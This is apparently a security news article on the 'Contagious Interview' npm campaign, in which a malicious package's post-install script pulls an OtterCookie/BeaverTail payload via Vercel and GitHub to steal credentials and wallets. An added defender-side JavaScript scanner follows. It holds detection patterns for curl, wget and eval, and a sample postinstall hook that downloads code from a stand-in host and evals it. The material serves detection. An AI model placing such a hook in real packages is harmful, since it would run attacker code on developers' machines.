Tuesday, December 2, 2025

Contagious Interview attackers go ‘full stack’ to fool you

When an unsuspecting developer installs such a package, a post-install script runs and reaches out to a staging endpoint hosted on Vercel. That endpoint in turn delivers a live payload fetched from a threat-actor-controlled GitHub account named “stardev0914”. From there the payload, a variant of OtterCookie that also folds in capabilities from the campaign’s other signature payload, BeaverTail, executes and establishes a remote connection to the attackers’ command-and-control server. The malware then silently harvests credentials, crypto-wallet data, browser profiles and more.

“Tracing the malicious npm package tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app, and from there to the threat actor-controlled GitHub account which contained 18 repositories,” Socket’s senior threat intelligence analyst Kirill Boychenko said in a blog post, crediting related research by Kieran Miyamoto that helped confirm the malicious GitHub account stardev0914.

A ‘full stack’ adversary: GitHub, Vercel, and NPM

What makes this campaign stand out is the layered infrastructure behind it. Socket’s analysis traced not just the NPM packages but also how the attackers built a complete delivery pipeline: malware-serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and remote command execution.
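As an added example (not code from the article or from Socket), a small defender-side check for the install-time behaviour described above: it inspects the lifecycle scripts in a package.json for commands that fetch and evaluate remote code, which is the hop from post-install hook to staging endpoint the campaign relies on. The manifests, package names and URL below are constructed for illustration.

```javascript
// Added example (not from the article or from Socket): flag npm lifecycle
// scripts that download and run code at install time.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators of a script that reaches the network or evaluates fetched code.
const SUSPICIOUS = [
  { name: "remote-url", re: /https?:\/\/[^\s"']+/i },
  { name: "downloader", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { name: "inline-eval", re: /\bnode\s+-e\b|\beval\s*\(|new Function\s*\(/i },
  { name: "obfuscated", re: /base64|fromCharCode|atob\s*\(/i },
];

// Returns one finding per lifecycle hook that matches any indicator.
function scanManifest(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const hits = SUSPICIOUS.filter((p) => p.re.test(cmd)).map((p) => p.name);
    if (hits.length) {
      findings.push({ package: pkg.name, hook, indicators: hits, command: cmd });
    }
  }
  return findings;
}

// Scan every manifest found under node_modules or a lockfile walk.
function scanAll(manifests) {
  return manifests.flatMap(scanManifest);
}

// Constructed sample manifests; the package names and URL are made up.
const SAMPLES = [
  { name: "benign-lib", scripts: { test: "jest", postinstall: "node-gyp rebuild" } },
  {
    name: "suspicious-ui-kit",
    scripts: {
      postinstall:
        `node -e "require('https').get('https://staging.example.invalid/p',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})"`,
    },
  },
];

for (const f of scanAll(SAMPLES)) {
  console.log(`${f.package}: ${f.hook} matched ${f.indicators.join(", ")}`);
}
```

Running such a check in CI alongside `npm install --ignore-scripts` keeps post-install hooks from executing before a reviewer has looked at them.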
